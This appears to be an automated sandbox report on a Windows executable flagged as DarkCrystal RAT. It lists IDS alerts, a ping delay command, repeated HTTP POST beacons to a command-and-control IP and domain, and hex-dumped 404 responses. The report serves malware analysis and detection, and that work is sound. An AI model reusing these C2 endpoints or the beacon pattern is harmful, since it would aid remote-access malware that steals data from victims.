Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49763 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49790 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49851 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49877 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49912 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49931 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49953 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49975 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50020 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50022 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49995 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50021 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50023 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50019 -> 37.44.238.250:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

IP Address: 37.44.238.250 37.44.238.250

Source: Joe Sandbox View

ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR

Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 228472cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 228472cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 228472cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 228472cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 228472cm.n9shka.top

Source: unknown

HTTP traffic detected: POST /PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 228472cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:42:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:42:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:43:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:43:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:43:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:43:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:43:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:44:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:44:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:44:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:44:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Dec 2024 14:44:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
